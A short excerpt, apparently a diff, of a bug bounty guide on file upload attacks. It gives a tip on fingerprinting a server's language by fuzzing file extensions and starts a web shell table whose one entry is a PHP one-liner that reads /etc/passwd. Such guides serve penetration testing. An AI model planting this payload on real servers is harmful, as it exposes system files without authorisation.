variable190/BugBounty/docs/bug-bounty-guide/file-upload-attacks.md

 # File Upload Attacks

+**Tip:** Find what language runs the web app by fuzzing the extention of the index page for common file types (/index.FUZZ).

+[Wappalyzer](https://www.wappalyzer.com/) can also be used to detect what languages and othertechnologies are used.

 ## Web Shells

 | Web Shell | Description |
 |-----------|-------------|
 | `<?php echo file_get_contents('/etc/passwd'); ?>` | Basic PHP File Read |